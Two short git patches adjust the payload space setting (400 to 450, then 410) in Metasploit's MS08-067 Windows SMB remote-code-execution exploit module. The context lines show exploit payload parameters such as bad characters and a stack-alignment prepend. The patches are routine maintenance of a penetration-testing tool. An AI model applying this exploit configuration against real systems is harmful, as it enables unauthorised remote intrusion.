From 2a89a2bc9aecc4bbdd24afe110b9ec98f7949533 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 25 Nov 2015 07:13:16 -0600 Subject: [PATCH 1/2] increase the amount of space needed for ms08_067 --- modules/exploits/windows/smb/ms08_067_netapi.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index 61ce551f51..8e18073c31 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => true, 'Payload' => { - 'Space' => 400, + 'Space' => 450, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40", 'Prepend' => "\x81\xE4\xF0\xFF\xFF\xFF", # stack alignment 'StackAdjustment' => -3500, From 35ea8c3f7409cdbc120bfbae5b58f1e502a5b7d3 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 25 Nov 2015 11:25:57 -0600 Subject: [PATCH 2/2] relax space needed a bit less, work with Windows XP and 2k3 --- modules/exploits/windows/smb/ms08_067_netapi.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index 8e18073c31..0f0328abf5 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => true, 'Payload' => { - 'Space' => 450, + 'Space' => 410, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40", 'Prepend' => "\x81\xE4\xF0\xFF\xFF\xFF", # stack alignment 'StackAdjustment' => -3500,